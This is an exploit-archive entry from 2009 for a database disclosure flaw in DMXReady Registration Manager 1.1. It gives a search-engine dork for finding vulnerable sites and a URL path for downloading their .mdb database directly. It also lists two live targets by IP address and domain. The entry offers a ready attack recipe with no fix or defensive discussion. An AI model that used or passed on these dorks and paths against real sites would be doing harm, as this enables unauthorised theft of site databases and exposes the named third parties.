id: 5187
date: 05/14/2009
title: DMXReady Registration Manager 1.1 Database Disclosure Vulnerability
author: S4S-T3rr0r!sT
cves: 

===================================================================
DMXReady Registration Manager 1.1 Database Disclosure Vulnerability
===================================================================


************************************************** *****************************
# Title : DMXReady Registration Manager 1.1 Remote Database Disclosure Vulnerability
# Author : S4S-T3rr0r!sT
# S.Page : DMXReady CMS Plugin Applications Web Site Design Extensions Dreamweaver ASP Template Database Driven
************************************************** *****************************

D0rk : "inurl:inc_webblogmanager.asp"

Exploit :

# http://[target].com/[path]/databases/webblogmanager.mdb

l!ve D3mo :

# http://74.200.213.93/databases/webblogmanager.mdb
# http://www.nomorewar.com/databases/webblogmanager.mdb


V1V4 GaZa

./Done




#  0day.today [2023-03-24]  #